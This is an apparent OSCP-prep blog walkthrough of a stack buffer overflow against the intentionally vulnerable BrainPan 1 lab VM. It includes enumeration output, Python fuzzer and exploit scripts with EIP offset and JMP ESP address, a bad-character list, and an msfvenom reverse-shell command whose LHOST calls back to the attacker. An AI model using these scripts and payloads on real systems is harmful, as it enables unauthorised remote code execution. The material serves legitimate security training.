OSCP Prep — Buffer Overflows Made Super Easy With The BrainPan 1 VM

assume-breach
17 min readAug 28, 2020

--

Buffer overflow exploits have been regarded as one of the biggest turn-offs of the OSCP student.

I am here to tell you that missing that 25 pointer is just ridiculous. The 32 bit buffer overflow is one of the easiest boxes on the exam as long as you follow this methodology.

Going through the section of the course PDF will absolutely put you to sleep. I actually wound up skipping it because I was lost after just a few lines and found it to be such a snooze-fest.

This guide is really designed to be an alternative to the course material so you feel absolutely comfortable with the process and have a methodology down to get through the dreaded BOF in less than an hour with documentation.

Okay so enough about the OSCP, let’s get cracking on our Buffer Overflow!

The first thing you want to do is download BrainPan 1 from vulnhub. It’s super easy, but will also give you some good practice. Once it’s downloaded, fire up your Kali box and start the enumeration process.

Enumeration

user@kali:~/Desktop$ nmap -A -sV -Pn 192.168.1.198
Starting Nmap 7.80 (
https://nmap.org ) at 2020–08–27 14:52 EDT
Nmap scan report for brainpan.attlocal.net (192.168.1.198)
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.80%I=7%D=8/27%Time=5F48010C%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,”_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|
SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\
SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x
SF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.82 seconds

All right! Looks like we have 2 ports open: 9999 and 10000. Let’s start out with port 9999 and try to connect with NetCat.

nc IP 9999

Bummer. The BrainPan application is running on this port, but it’s asking for a password. Since we don’t have the password, let’s just move on to the other port. It is running an http service so maybe it’s a website.

It is a website and its talking about safe coding. Maybe we should try for some directory enumeration. Let’s fire up dirb and see what happens.

user@kali:~$ dirb http://192.168.1.198:10000

— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -

START_TIME: Thu Aug 27 15:01:24 2020
URL_BASE:
http://192.168.1.198:10000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

— — — — — — — — -

GENERATED WORDS: 4612

— — Scanning URL: http://192.168.1.198:10000/ — —
+
http://192.168.1.198:10000/bin (CODE:301|SIZE:0)
+
http://192.168.1.198:10000/index.html (CODE:200|SIZE:215)

— — — — — — — — -
END_TIME: Thu Aug 27 15:03:07 2020
DOWNLOADED: 4612 — FOUND: 2
user@kali:~$

Dirb gives us a few directories to check out. Let’s over to the /bin directory and see what’s up.

Woooh, check it out! There’s a copy of the BrainPan application.

NOTE: You don’t need a Windows box to do this since you can use Wine, however, you will be given a Windows box on the exam to use with your BOF attack, so I recommend getting a Windows image and setting up a Windows box to work with. I’m going to use Windows 7 64-bit. It’s pretty easy to get a copy of this ISO so grab yourself one!

I had a hard time setting up wine32 on my 2020 Kali image, but if you’re using the OffSec 32 bit Kali image, you should be good to go.

Okay, if you’re using a Windows box, go ahead and download brainpan.exe. We are also going to need Immunity Debugger. It’s free so download it to your Windows box and we’ll be ready for the first phase.

Fuzzing

The methodology is that we have a separate version of the program running on our Windows box so we can perfect the attack before sending it to the real target.

Make sure that the brainpan.exe app is running on your Windows machine and get the IP of your Windows box.

With brainpan running on my Windows box on port 9999, I’m ready to start the fuzzing process.

Fuzzing is basically trying to crash the program with an boatload of data. For the purpose of this demonstration, this proof of concept fuzzer will be enough.

More than likely, you will be given a POC for the BOF in your exam so you will not have to worry about writing one from scratch. If you are not given one, there is a BOF fuzzer POC in your course materials that will be enough to complete the task.

#!/usr/bin/python
import time, socket
# Create a string, fuzz from ilength (initial length) to tlength
# (target length), with increments of 500 (increment).
buffer=”A”
ilength=100
tlength=2000
increment=500

for x in range(increment,tlength,increment):
print “Fuzzing with %s bytes” % x
buffer = “A”*x
print buffer
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘IP’,PORT))
time.sleep(1)
s.send(buffer + “\r\n”);
s.close()

x += increment

The Fuzzer Break-Down

Okay, so a little bit about what is going on here. Obviously, the fuzzer is written in Python. You’ll copy this into your text editor and save it as fuzzer.py or something similar. Make it executable with a chmod +x fuzzer.py.

The buffer is going to be a series of “A”s. The series of “A”s will start to add up while it’s fuzzing the app. So it wills end 100 “A”s and then 1000 “A”s and then 1500 “A”s until the program crashes.

So, let’s do this together. Replace the IP and Port in your code with the IP and Port of the app on your Windows box, not the actual BrainPan VM that is running. Remember, we are working on a proof of concept on our Windows box before we try this on the actual CTF VM.

With the brainpan.exe app running on my Windows box, I start the fuzzer.py program on my Kali machine.

Here is the output

user@kali:~$ ./fuzzer.py
Fuzzing with 500 bytes
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Fuzzing with 1000 bytes
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Fuzzing with 1500 bytes
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
user@kali:~$

At 1500 bytes (As), the brainpan.exe application crashed!

That’s great! We have some sense of the amount of bytes needed to crash the app.

Okay, so what we are going to look at is the app when it is attached to the Immunity Debugger.

Right click on the brainpan.exe application and click on Run as administrator.

This is going to restart the application so that we can test it further. The next thing you want to do is open the Immunity Debugger application the same way, with administrative privileges.

The application will open.

Click on File and then click on Attach at the top left hand side of the screen. You should see the brainpan.exe program listed.

Click on brainpan and then click Attach. You should see the boxes change.

Notice at the bottom right hand side of the screen there is a Paused icon. This means that Immunity is paused from collecting data.

If you click on the Play button under Debug the debugger will start collecting data and Paused will change to Running.

Okay, so at this point, brainpan.exe is attached to ID and we are good to go. Looking at the registers, we see that there are a few letters. The one that we are going to worry about the most is the EIP.

This register basically tells the program where to go next. So, if we can overwrite the EIP then we can control where the stack goes next and eventually, point that to a reverse shell code.

When we are fuzzing the program, we are trying to overwrite the EIP with our fuzzing character of “A.” Let’s fuzz the program again with it attached to ID and see what happens.

After running the fuzzer, brainpain crashes.

We see a ton of As in the program. Switching over to ID, we see that Running has now changed to Paused. This is because the program crashed.

Furthermore, we see that the EIP register has been overwritten by 41414141. This is 4 “A”s in hex.

Are you still with me? If it’s not making sense right now, it will start to in a minute.

So, to sum up what we have done, we have fuzzed the program and found out that the program crashes at 1500 bytes or maybe a little less. We can overwrite the EIP with “A”s. So, now we know that we can control the flow of the program’s stack.

What we don’t know is the exact amount of bytes (or As) we need to keep the app from crashing. Our next goal is to find that out. So let’s reset our ID and the app.

Restart brainpan and run it as administrator. Restart ID and run it as administrator. Reattach brainpan to ID.

Okay, so how do we find out exactly where brainpan crashes? Well, there is a handy tool given to us from the people at Metasploit. It’s called pattern_create and it runs on Ruby. It comes with your Kali box and you can find the syntax to use it below.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l “bytes”

Now, we know that the app crashes at 1500 bytes. What this tool does is creates a pattern that we can read in the EIP register to find the exact offset of the EIP. If it doesn’t make sense, just keep going and you’ll see what happens.

Let’s run the tool and get the pattern. Replace bytes with 1500. This will make the pattern 1500 bytes long.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1500

Great! We have our pattern. Now we need to supplement this into our fuzzing app. What you might want to do is copy your fuzzing code over to a new text editor and save it as buffer.py so you have a working fuzzer while we construct our buffer overflow exploit.

Right now your exploit should look like this:

We are going to paste the pattern into where the “A” section is. Now your code should look like this:

Scroll all the way to the right of your text editor and make sure that you have a quote on the end of your pattern:

If you don’t, your exploit will not work.

We need to delete some parts of the code in order to get it working properly. You can just copy this. It already has the pattern in it:

#!/usr/bin/python
import time, socket

buffer=”Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘192.168.1.243’,9999))
time.sleep(1)
s.send(buffer + “\r\n”);
s.close()

Save your exploit and go back to ID to make sure that brainpan is attached and that you have ID Running at the bottom of the app. If not, hit that Play button.

Now, chmod +x on your buffer.py exploit and then send it off!

./buffer.py

The app should crash pretty quickly and you will notice that the EIP has been overwritten by 8 numbers.

You should have 35724134 in the EIP register. Now, remember, this is simply a part of the pattern_create script. So, we need to translate that to find the actual EIP offset. I know, I know, just stick it out a little longer.

To find the offset, we are going to use pattern_offset, another tool offered by Metasploit.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q PATTERN

So when we put in the pattern that we found in the EIP register, we get the offset:

Our exact offset is at 524 bytes! All right, now we need a proof of concept. What we can do is try to send “B”s over to the app and overwrite the EIP. Remember that 41414141 is 4 “A”s in hex. So, 42424242 would be 4 “B”s in hex.

In the exploit code, we will remove the pattern. We already have the offset so we don’t need that anymore. Then we will put in 524 “A”s followed by 4 “B”s. It should look like this now:

Simple enough, right? We have 524 “A”s plus 4 “B”s. Let’s save the exploit, restart brainpan and ID, reattach brainpan and hit that Play button.

Send off your new exploit and see what happens. After executing our exploit, the EIP is overwritten with “B”s just as we wanted!

Sweet! Now we can start the real process of cultivating our exploit. Restart, reattach and hit play. But we are going to need another program to help us with the next part.

MonaModules is a python based script that gives us the ability to find vulnerable parts of an application. We need to install mona.py into our Debugger.

Here is the raw code. Copy it and put into a Notepad document. Save it as mona.py.

https://raw.githubusercontent.com/corelan/mona/master/mona.py

According to the documentation we need to install it in the PyCommands folder of ID.

We just need to copy it over.

Once we have that, we can resume our buffer overflow exploit. Back in ID, type !mona modules into the bar at the bottom of the program.

If we look at this output closely we can see what is protected and what is not. We should be looking for a program that is False for Rebase, SafeSEH, ASLR and NXCompat. False all around is the best. This means that it’s exploitable!

We see that brainpan.exe has false all around so we should be able to use it. Now we need to find a JMP ESP register. This is going to tell the stack to jump to the next address in the code. Eventually we are going to have it jump to our reverse shell code.

To do that, we need to know what the JMP ESP address is. JMP ESP is represented in the stack by “FFE4” or “\xff\xe4”. To find this, we’ll use mona modules and the command below.

mona find -s “\xff\xe4″-m brainpan.exe

For this command, we are really just finding the JMP ESP for brainpan.exe. When we type it into ID, we get exactly one pointer.

It’s hard to read from the screenshot, but the pointer address is “0x311712f3”.

Okay! We’re in business. Since this is a 32-bit buffer overflow, it is in little endian. This is because the flow of the stack goes from low to high. So when we translate this to our exploit code it will be written as “\xf3\x12\x17\x31”.

We are just taking the 4 bytes of the address and switching them for our the Bs. So now we can replace the 4 “B”s in our exploit with our new JMP ESP address.

Super easy, right? We are actually almost done! The last part of the exploit is putting in our shell code. We have our buffer length and we have the JMP ESP address. So we need a shell code that the JMP ESP will send the program to in order to initiate the reverse shell.

However, we don’t know what characters could cause the program to crash. So now, we have to find the bad characters in the stack. I’ll warn you, this isn’t hard, but it’s time consuming. Hopefully, this one isn’t too bad.

So, let’s go back to our code and insert a section for bad characters. Here is the list of all the ASCII characters we should look for. You can copy this and save it to your Kali box as you’ll probably want it for your exam:

badchars = (“\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f”
“\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40”
“\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f”
“\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f”
“\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f”
“\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf”
“\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf”
“\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff”)

Let’s create a variable on our exploit for bad characters and then put it in the buffer line:

#!/usr/bin/python
import time, socket
badchars = “\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6”
buffer= “A” * 524 + “\xf3\x12\x17\x31” + badchars

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘192.168.1.243’,9999))
time.sleep(1)
s.send(buffer + “\r\n”);
s.close()

Notice that I already removed “\x00” from the list. This is known as a null-byte and will stop execution as soon as it is recognized. This is why you can use it in LFI to keep apache from appending an extension to your shell code.

Your code should look like the code above. Restart, reattach and hit play. Send your exploit over and crash the app again.

Once you crash the app, go to the ESP field in ID and right click on it. You should see a tab that says Follow In Dump. Click on it!

In the bottom left window, you should see where it says Address. If you scroll up just a little you’ll see where you “A”s start in the dump:

Here is a screenshot of the dump when I leave the null-byte in:

Notice the “A”s, then our return address, then everything just starts going crazy. Now if I take the null-byte out of the bad characters list, everything starts to look good:

Notice that we have a bunch of “A”s then our JMP ESP and then the characters in our list. Pretty cool, huh? So, now we just have to go one by one through the characters.

Starting down the line we have 01 02 03 04 05 06 07 08. Everything looks good. You’re looking for logical progression through the characters. 01 is \x01. 02 is \x02 and so on.

Look through the dump and see if you can find the first bad character. Trick question, there aren’t any. If there was, you just remove that character from your list and make a note of it for future reference. Remember, we can’t have bad characters in our shell code or it will crash. So now, time to make our shell code!

We’re almost there! Let’s use msfvenom.

Even though this is a Linux box, let’s remember that the application is running on Windows as an exe. So our reverse shell payload generation will look like this.

msfvenom -p windows/shell_reverse_tcp LHOST=YourIP LPORT=4443 -a x86 -b “\x00” -f c

It’s a Windows reverse shell. The a flag is for architecture and we are doing a 32-bit buffer overflow. The b flag is for the bad characters and we are trying to get the output in C language.

My shell code came out like this:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.188 LPORT=4443 -a x86 -b “\x00” -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
“\xbe\x71\xf0\x14\xf3\xda\xdd\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1”
